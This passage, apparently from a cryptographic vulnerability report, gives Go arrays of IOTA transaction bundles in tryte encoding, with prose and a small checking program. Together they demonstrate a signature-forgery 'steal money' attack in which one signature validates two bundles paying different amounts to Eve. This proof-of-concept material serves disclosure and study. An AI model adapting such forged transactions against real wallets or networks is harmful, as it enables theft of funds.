BXZBIIZOFFDNBRNQFZNFSDH9NTKTKTXOPRZZGYWPVEFQHIZSBGDLICHPAPSLXNCQMMMN9JOAPKGMJDFAHAALWZRHRZCDNUMMYHWFWWVRRLWGJ9M9HRZFKGNUDOCINHUOGBKDUFBGNMXIYYULCCQWGCETCNVTPKBUIMAJBOUCAUVFVKO9PTKB9XORQXHPCVGVHNBZCABJNGNDRZALIXWBHRAWLYOVPNEOGTCSXCFTQCFBIQOUCTRCKSHPJYGXVOGKZFUID9UTNTHHHPUZOUGBTRDIJDJYAFLSGZNQQ9MKDBXSTELCSEPOME9SXYPTOATRDCKTEWJXNYWEPRGUCSXMILODMO9LBZEPC9QLDYYTSSKCVNAHQBPJCMLOZVTRCFEGCU9ZHK9VKLJLVOJCTMDBEAVGCOCYMBFJJSADVSLBNYTPNWDY9CE
DTKLTLI9DVYXJKKCF9NS9AUCNKNCBTJLWJQXKSCGRTMCRVKPQXJMLCPTLUBNM9JPKYQXPFLDFTZBCJUAWOBWDS9WJVWOYHHFHUPMUJBZQDUWDDODRCEAPHYTAJXERJHA9VNLWMOAOBPWVVBOSIXBWJWTNQXBMBPHYY9LODFTETJUSVNVUTLYIXXAA9VPGUBUWDAFWZFWVDIQBTBALLKSQPEFPWGWZKYDO9QWB9FHQMOAONYMQU9AQOOJHDJCWGXBIOJGFQKGSSOFQN999999999999999999999999999OIWIKARHXINUDPCAKJPWE9KLQQWQONOPXD99B99999999C99999999UXOTHHZPYHAKLQNOYGHUFDNIQORRPQVRXQPVCZEWEMPHVIJB9OJIDB99ZJAZLFMXNOKBRSDG9HXSOLGLBAXNROPYOSAHUZEPPIWTYNZTQBVNRLLXZRNFSGUTEOGLGTUJSNSUAULMVOMQPUPVUGSZIOEJPWJQG99999999999999999999999999999999999999999999999999999999999999999999999999999999999999COFRVPHUBRSRAS9DHXTJ9UEMJOWHLPCECP9FQQOFLOWYOMSMFAWELLOV9FZ9LVHALTB9H9SNXUTFYMTCO",
	"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999FHCLCTGISPCIDWQYNQYKZZZRS9CXJPFNIPCITNCVVYINBXEYFEYKXGETCZMIQJBMBZBOMSDVFPAXR9OBNEZJELKB99999999999999999999IOTFORALL999999999999999999VRNOPXD99C99999999C99999999UXOTHHZPYHAKLQNOYGHUFDNIQORRPQVRXQPVCZEWEMPHVIJB9OJIDB99ZJAZLFMXNOKBRSDG9HXSOLGLB999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999JSNUYGIJFWAPFKZBNHSNCRXOVCSUDEUCVNXSELYDGJWUFAEZCCAIQPXLMQOWSKM9YLGPLOVSFY9FMOCQR",
}

Steal Money Attack

These two bundles demonstrate the signature forgery "steal money" attack described earlier in the report. A signature on STEAL_BUNDLE1 is also a valid signature for STEAL_BUNDLE2. We also provide the bundle structure below.

In STEAL_BUNDLE1:
- tx0  50000 spend to Alice
- tx1  -939211930 fund, Alice's sig
- tx2  0, Alice's sig
- tx3  100 to Eve 
- tx4  0
- tx5  939161830 to Alice
- tx6  0

In STEAL_BUNDLE2:
- tx0  50000 spend to Alice
- tx1  -939211930 fund, Alice's sig
- tx2  0, Alice's sig
- tx3  129140263 to Eve
- tx4  0
- tx5  810021667 to Alice
- tx6  0
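
The amounts in the two listings can be checked mechanically. The following is an added example, not code from the report: it confirms that each bundle balances to zero and reports which trits of the value field differ between the two bundles. The 81-trit, least-significant-first balanced-ternary value field and the tryte alphabet are assumptions based on IOTA's standard encoding, and all function names are hypothetical.

```go
package main

import (
	"errors"
	"fmt"
)

// Amounts copied from the tx0..tx6 listings above, in bundle order.
var stealBundle1 = []int64{50000, -939211930, 0, 100, 0, 939161830, 0}
var stealBundle2 = []int64{50000, -939211930, 0, 129140263, 0, 810021667, 0}

// Assumption (not stated on the page): a value field is 27 trytes, i.e. 81
// balanced-ternary trits, least significant trit first.
const valueTrits = 81

// Tryte values 0..13 map to '9','A'..'M'; -13..-1 map to 'N'..'Z'.
const tryteAlphabet = "9ABCDEFGHIJKLMNOPQRSTUVWXYZ"

// toTrits converts v to n balanced-ternary trits (-1, 0, 1), lowest first.
func toTrits(v int64, n int) ([]int8, error) {
	trits := make([]int8, n)
	for i := range trits {
		r := v % 3 // Go's % keeps the sign of v, so r is in -2..2
		v /= 3
		if r == 2 {
			r, v = -1, v+1
		} else if r == -2 {
			r, v = 1, v-1
		}
		trits[i] = int8(r)
	}
	if v != 0 {
		return nil, errors.New("value does not fit in the field")
	}
	return trits, nil
}

// valueTrytes renders v as the 27-tryte value field of a transaction.
func valueTrytes(v int64) (string, error) {
	trits, err := toTrits(v, valueTrits)
	if err != nil {
		return "", err
	}
	out := make([]byte, 0, valueTrits/3)
	for i := 0; i < len(trits); i += 3 {
		t := int(trits[i]) + 3*int(trits[i+1]) + 9*int(trits[i+2])
		if t < 0 {
			t += 27
		}
		out = append(out, tryteAlphabet[t])
	}
	return string(out), nil
}

// balance sums the values of a bundle; a valid bundle sums to zero.
func balance(values []int64) int64 {
	var sum int64
	for _, v := range values {
		sum += v
	}
	return sum
}

// compareBundles maps each transaction index whose value differs between the
// two bundles to the trit positions at which the encoded values differ.
func compareBundles(b1, b2 []int64) (map[int][]int, error) {
	if len(b1) != len(b2) {
		return nil, errors.New("bundles have different lengths")
	}
	out := make(map[int][]int)
	for i := range b1 {
		ta, err := toTrits(b1[i], valueTrits)
		if err != nil {
			return nil, err
		}
		tb, err := toTrits(b2[i], valueTrits)
		if err != nil {
			return nil, err
		}
		for pos := range ta {
			if ta[pos] != tb[pos] {
				out[i] = append(out[i], pos)
			}
		}
	}
	return out, nil
}

func main() {
	fmt.Println("balances:", balance(stealBundle1), balance(stealBundle2))
	diff, err := compareBundles(stealBundle1, stealBundle2)
	if err != nil {
		panic(err)
	}
	for i := range stealBundle1 {
		if d, ok := diff[i]; ok {
			t1, _ := valueTrytes(stealBundle1[i])
			t2, _ := valueTrytes(stealBundle2[i])
			fmt.Printf("tx%d differs at trits %v\n  %s\n  %s\n", i, d, t1, t2)
		}
	}
}
```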


var STEAL_BUNDLE1 []string = []string{
	"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999ROQDJLWUDUXBKHJ9PNUPEBYLSJTSAT9RCKFVTCJFDUKHZJUDSSTELTIRA9DHKPUZTGSHAZNJKOFFKAXXPWPOC99999999999999999999999IOTFORALL999999999999999999QONOPXD99999999999F99999999QLQGXIBGDZMQP9OYZELAPXFHECTSGTDLDAABBYCUWMZHSDTQOOVXZUPVPLOSPHEBIQ9VVHCN9GBYKXZVNGGJJRHED9WMQCZEOBLKEKVZCUO9XMEPLEZGSLRBATHHTCHRPKLHGLXUWCD9YQMZ9HUNJHXMTEOHB99999999999999999999999999999999999999999999999999999999999999999999999999999999999999CJHXQRHLAIHHRVEBB9DWBFYQSTTTDYUAPXXFRNEFWYCKHWJRIVH9VIZZJXMKVJEFVEIOWSSQJFVVRMBKE",
	"NERRCOH9XVVNR9JAXBWBJMIENNZUVOCSRD9FUZBFCF99YAEG9CQZOFFUECKVEJTCKTAQFGACMXUVAFPERBQOMDGTSSSTNCXZHHBQSNOEAAMDCYNVJLDUI9OQUJAPPRRPIHGGBVHLSAENATYL9T9JSUXRZOEGKNSMVD9TQDFMYUAFVMUNXRCPQYDOG9SYFEE9DBYI9JZFXFKMITHVSPAXAATGOGGFFULTQLZGEIBHZFFCLOZVQCKMCGFSDUOGBLLQILJ9LIUU9VRTXKLOFFIIBTFFMIIRVRLRSTDLEPMWDVDPXGYWILHVDJ9YHYSYTLHFIXWGDGJEOTFRXPSZOHTI9GJXTXRWPJCURZZWVQDAXLYCYHJHQNECPDQHXGBQTJPQNLPLIUZSILFW9DOPI9WYQWGPEWTTIOFJOBAVZNDHH9PIADULXTMJ9DLDUPAWUGWZOFLZXGWJITUIQEBUHBKWWIDOOHMELWPUAPCCGOEFPRYVXYNERCZWZTZNBYXGLCTZNXCXNSFAJEHTHCIELCEULXHFXALCPLSDRLABPJXFJRSJSBMCHZ9LPSGHIMZLFUOKMLKBDNTKYZHHKWFKUQWDSJLOFGSXFQTMKCKZDWGLWYFRUCIVTGAQZPTK9GALHABNBTPEAUMSBNOVNKKTEKRKYSHPVBCISD9OT9KXUWATMD9IEZMJTAZUZIWIE9ZIULBYUFNXJCRMYZTVSDIFNNCHYTYWCEAUKJSVVQCFDAHRUBHWMWYKTKSSILSPZIHUTSEMIPYKENRSFG9AWIVPRW9TSGQM9YIHKZXX9ZPFXAQG9TTUMACUDGLF9KWSADOQNTHHZ9PV9KPKWOPGIVJKFOKSHIAYMMUPSLBXMEGSJUUFDYGPVDVJFTKN9EFINBPTYDLOBRTAHVDJSPYUYRRAAZCPLNXEAJJJWCHWHMXRIYEXAVSLOMPOVNRXKPTMZENZO9ACQLAVQBZNTGASYYSCVVCIFNJXBCJFE9DOLIS9KHSOQHLMPEMFVILZRBEV99WOCKMQGXIQYYVLRDLJOOHOQHFZEXZJJIDBBRPPOGIADPNFGYMCIFWTQYIQTAQOFQOEUHJIKEWLHVYNFYQRNGBVAITMNGFYKFZKPWKMTPDATUGGIKOWIKIRVTNOPEPKAAWHM9MIUTNSTKQAAGOVSFQITCLVNCRMMEAHPBDXVP9L9IQKPPVAPA9WJQSNYDHRMUXJOFRZKHEWHFWCIZYXYWQBVPKOGJNKSACCJRNAWFKUHPFIPCNFUINKGJPPKCNEHSFJBFTXMGCIPDBPIKSBBQTEPL9LLNCJIYIKXPNAHZCP9WHFFEELQCKBNFKUPXFWDJINAHEZZCWUTPMHVMREAKBGPVCEQZCAIPSCJNHUIKUBHSGVFQ9HTMFTHRKNHKVEYCQGRQADCREOLVAOK9OMUKCFBUZDHFGJWTYNOWZYWRYVQJHVSRPPOEHJIBJILMXI9EPWUDVCKQZWWNDUGPPTTOVHNCW9GCGFSXHMJQXUFYZZUCNUCUWLZORAYLHTLITDCFCDLSLVGT9FXSCXXJBIZCNKYIAMSNKSEDMBURXHTADAAYBZJIKYVYQTCHQBMYVEWCJFZDDCOBLDJDBCXFSXFMNMMRHJODCKXFBIOWTPRBXDFRHXRANNDXIXMELKOJRXNLJDJPYSSZU9TDXWRVCXTOCHMEIZVXVBSIZYTHCECNYTDYLJ9UA9KFQFLGNJIMVPPHQLLZFUWMJBLZCNROYMEBCJWOXOPJNIPXBCODTXGQIV9IBMEMOFRFSWIVVFCTESZSZKCRMDIXTUGVLWKXBECYOIDL9SFMREISVZGVRTVOXBXBVMAUBYWNOUILNYBEVFSFBSTETA9TBXBPDYLQ9JNDGWGPLACPGIMLSWOOTGUDTPU9SRVFJETLIHEWTBJHXCPQDROADBXB9KVXK9WWQPKLXS9PJE9JGGT9H9XWQURBLDBSEUMZVCVZMSVAPGEFMBZJIYSTYGXCFICHSZPL9CWA
KCJZLPMNBRDTFLJRYQZSGERDLWWRLBTDD9HTEIPYYUSYDJKF9NMXUJXPPYJFDCEEQGJGPIBZV9EBBZANJMTMIUSCWOLUBDTZTAVYK9JBQSG9CT9HYYZXNOWFNTOSDDBPPWGXCXHSZFXCBLACZBJTHYWSQVMXWJMKCSAMGRFWGAB9UDHUUSBXOGNAHEGNXUBUWDAFWZFWVDIQBTBALLKSQPEFPWGWZKYDO9QWB9FHQMOAONYMQU9AQOOJHDJCWGXBIOJGFQKGSSOFQNZLBSOPY99999999999999999999IOTFORALL999999999999999999QONOPXD99A99999999F99999999QLQGXIBGDZMQP9OYZELAPXFHECTSGTDLDAABBYCUWMZHSDTQOOVXZUPVPLOSPHEBIQ9VVHCN9GBYKXZVNWBOAOQ9BHYZ9CCMNHCFCQFJYR9BHLQE9BER9BGZUVXLMWLMGIVXRQGRUSFAYZFBTKVTQWWDEIFCV99999999999999999999999999999999999999999999999999999999999999999999999999999999999999XWLLBTYKWXYECPTHKLODD9SMCWWHFSYPP9SISSTYAHCSWTTHGIU9ZDSURAGHZSMOCD9UFXLONCPPEPROK",
	"AZZOAMZUHGXDUOIHRAUMIHKXGGHHEQQMIWC9YJEOBBSGHSPAEOMETB9KJYWY9JAAIBATGBLJKSGOJRESIEGGCOECHJUUDSNAHRM9IIXXGNMTEMKDYW9RVWNDDLMGYWFZGLSXNXXHAKRHKXCKQBHLHTYGICBUS9IBSDPACFSKIXLBMGU9FLFLWNFEVDACHZYBOGNEYHUAWLEOFPUTYFHAKXKI9THRPSJHJSKLMNRSNHOAULXJUVEENI9IVYFWGSPUALPGHPSIIZGAQTMZOLUIT9IGINEPOOWRQDMWY9XIPWCXAVLFXVCZEPBKZVMGQY9REKFNFUYSCIYV9KSJVOYRMGERHSOWJZGLKFHPYUECGMNJHUVTOPHVGPPQBRTQEQHTBQRLUAYXAXUFCSAHZKXZJR9SYNTMTLGDV9MEQACYCRF9BRVUKXTD9GMOYIIMPMNFPLTTNQYOPRBCBKIKZBESRYDTRUS9SWATWDBGQKHOLCRM9PUPBENELJREFFJLUDVZNMPIFTALJQLMFMRTUUKQWGQTZAMOOOSLEJQIZEHEXZWYRYXPVUGZERAHPGNLLAIYRYIOMZT9ZHPGYWWJOUHLTLZYUGEQNYMUXZVKSYCGUZFGOPZONKNFZJNXVICANRULRH9LWD9W9CPQE9NZJHPTCSDEMKOSLMDFYAEFYLTNYJOT9XNQVQYEFCNTOCKYRGTGCFYFTXXFMGXNTUDWIESCQKJYUJF9JSHLI9YEEGZKHE9LPJGGZMMHFSGOMRKGXVUDNNERHWVRMAIFY9YQJHAUCLTPBBHBMJUCCIPYGUDPIVTYJWNRPGKL9HGTUNZDGGTMWUMXEOMQM9FN9DLURPNRPFLYZRDLGHGAQUUGMRFODBFBBGXSAQYEEFASHDDSMQVNGKY9QWBPRAHLVKRDFVZBTTBAFLZUUHY9RCRVAVTELVKSVPBETWDSBYDBZHOQWOKHLGWCNMQINDMGICZIFNOCPXBZQVTUSPZHJFFSH9UOAJ9XNHSZAMEXKVXIAVGLQZABT9UPDXLMYZCVWRVYHMPHYDTCDATCIPLCEKTXHXCAPGLTEYGCMBQQTSBVGOIRVAJKKZVNIOYPWDPDSIQVEHUNFRJMJXGREBBNDRGEXYTGMEQPONAVJF9LUQKCTKUXLM9VUMVRBPPRJWXPDNGTBW9VLMIQVNCVSHLFTD9CLTCYBXNYTXMJEAA9YRVBTMDVKFSEYBFWBFEORSUCDSX9ARMLOTZKMQTLTWNRKXPBBMXRPVVGEHMYJBNVNPNCQDSGZFSCXXQMOUMSIXUQQAWKBDQQVFUCMFGNJLCZELGVXTKVYSFEZZHJGZJLNPHYXHKBW9P9LVFUDRHFPVOI9LWCZPYXMSCDSWNHHNYYSHUMCNQQRXIHKUOETNTLKBVBQOPM9VFHJAEZGMOBAAYKDLKEMPOWJLATXJFORBKMGQWCNIVFXWTMC9CQIQPPBLRHYQZYLFPBMJPGINRRWNUEKVXIDSKZZREEECKUWXBPVASH9HAQBTSYPCSDKCNVSPM9TEOLOBPCTBUUZRKOFIYCFAAYYPERRNOTDLCJBPIWVCPNSDQLZEUHVTAAHJHAXV9RRO9PSWBHJUUJHDCDRLTZKJOCXZNFQLRNNDRMNXNRFIKNEQRJMZZUJCCCEXNRSHQAEIAXLDQJMUFICNOELTHELM9AFA9WVITFB9XDYBIEQRVVOVHXOWLZNIWPGEUZXOHFFCBNLSADMWKIRRJGMFKSVSEALRYRHOYDYRXQPLFPJLUYRBUFSALRJQB9VGJGGNVPNEOGTCSXCFTQCFBIQOUCTRCKSHPJYGXVOGKZFUID9UTNTHHHPUZOUGBTRDIJDJYAFLSGZNQQ9MKDBXSRVBVLYXHUAOIQSVUMXXYCTMBAI9MNAUFGSYISCWUSKUPOVNPSTTO9ZS9LONAKNEIIGOENLXOZXGGQJZKANFSRF9FKWZHHKWQKNILFRAKXPZSVTBRIZAWUSFDQM9LQZUFAOIPPBJ
USWCQKSVNMXKWQLGEMCEBGCUKWKPHZLHHEVGVJUSXVJZZALDWQMANSRSQDILGIFTFV9KAQHDPW9WIEBANTXQUSDOHDDVZMDAXJVUA9JQQBHYBWHTUTCFZI9SSYFRSPQTKLFODJHQOZDWFSN9KKSBT9NVPUXLVLE9KP9MOFVFOOQFLZJTHCJXEPWGYBIPXUBUWDAFWZFWVDIQBTBALLKSQPEFPWGWZKYDO9QWB9FHQMOAONYMQU9AQOOJHDJCWGXBIOJGFQKGSSOFQN999999999999999999999999999ERPFQGKONFCGJPBSJPWXDVDUBGZQONOPXD99B99999999F99999999QLQGXIBGDZMQP9OYZELAPXFHECTSGTDLDAABBYCUWMZHSDTQOOVXZUPVPLOSPHEBIQ9VVHCN9GBYKXZVNESFYBVPPFCWFYBVAPPRWYWPSZCXKNJFMXHCQKFKULSXOZDXXFNO9LTIITVNTNY9OBELRKXNDHEAZ99999999999999999999999999999999999999999999999999999999999999999999999999999999999999XOMSNQHUBRSRAS9DHXTJ9UEMJOWHLPCECP9FQQOFLOWYOMSMFAWELLTU9FZ9LVHALTB9H9SNXUTFYMTCO",
	"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999VCW9RSPGJFINR9QWMSRVRLVQYRNOILXKBXTYUUPFNDMEVXIXPEYRP9CQONFEREKKQVEKVGRWMZMDI9TRZSD9999999999999999999999999LEBOSC9ZPUHTUYBZ9EKYGAPNEVZQONOPXD99C99999999F99999999QLQGXIBGDZMQP9OYZELAPXFHECTSGTDLDAABBYCUWMZHSDTQOOVXZUPVPLOSPHEBIQ9VVHCN9GBYKXZVNFREYQNGJSZPGVTLJIAW9BBMCJMYBSNAKWZACGFSMNTUDXEDJGKTQGIKGPZXDCJNBYAJHBDJXFYHR99999999999999999999999999999999999999999999999999999999999999999999999999999999999999VPXWQRHLAIHHRVEBB9DWBFYQSTTTDYUAPXXFRNEFWYCKHWJRIVH9VIZZJXMKVJEFVEIOWSSQJFVVRMBKE",
	"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999VCW9RSPGJFINR9QWMSRVRLVQYRNOILXKBXTYUUPFNDMEVXIXPEYRP9CQONFEREKKQVEKVGRWMZMDI9TRZ999999999999999999999999999SECFRDYMDHRZBOOSWNLTZGICG9ZQONOPXD99D99999999F99999999QLQGXIBGDZMQP9OYZELAPXFHECTSGTDLDAABBYCUWMZHSDTQOOVXZUPVPLOSPHEBIQ9VVHCN9GBYKXZVNDQFLULLKCQJFBBVNG9CEZCQSROMA9OBBBQXZFLNWVNOCRBNVQWYXALHPCQO9JNFXK9REIXIJQVGH99999999999999999999999999999999999999999999999999999999999999999999999999999999999999HG9SLQHLAIHHRVEBB9DWBFYQSTTTDYUAPXXFRNEFWYCKHWJRIVH9VIZZJXMKVJEFVEIOWSSQJFVVRMBKE",
	"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999QLBRTQLPHDMKBESFYFJWAGBRNLBKMWTXZLPRUSCYUKMOLVHTMKGUHDYSPXWPYTOVDPHOFYDADANRNSPJUMVJELKB99999999999999999999AXKFTXSHIVSILRNCDVLPIIRIGKJVRNOPXD99E99999999F99999999QLQGXIBGDZMQP9OYZELAPXFHECTSGTDLDAABBYCUWMZHSDTQOOVXZUPVPLOSPHEBIQ9VVHCN9GBYKXZVNHBSNZETOQDJJLVUNYMPZYZAGTK9WIGPNCFBHJHEXR9UUHRFVSWUYKLXHGDRXNDRMWABAAOPBRUNB99999999999999999999999999999999999999999999999999999999999999999999999999999999999999DYRTCGIJFWAPFKZBNHSNCRXOVCSUDEUCVNXSELYDGJWUFAEZCCAIQPHJMQOWSKM9YLGPLOVSFY9FMOCQR",
	"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999QLBRTQLPHDMKBESFYFJWAGBRNLBKMWTXZLPRUSCYUKMOLVHTMKGUHDYSPXWPYTOVDPHOFYDADANRNSPJU999999999999999999999999999IOTFORALL999999999999999999QONOPXD99F99999999F99999999QLQGXIBGDZMQP9OYZELAPXFHECTSGTDLDAABBYCUWMZHSDTQOOVXZUPVPLOSPHEBIQ9VVHCN9GBYKXZVN999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999FAEOTRHLAIHHRVEBB9DWBFYQSTTTDYUAPXXFRNEFWYCKHWJRIVH9VIZZJXMKVJEFVEIOWSSQJFVVRMBKE",
}

var STEAL_BUNDLE2 []string = []string{
	"9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999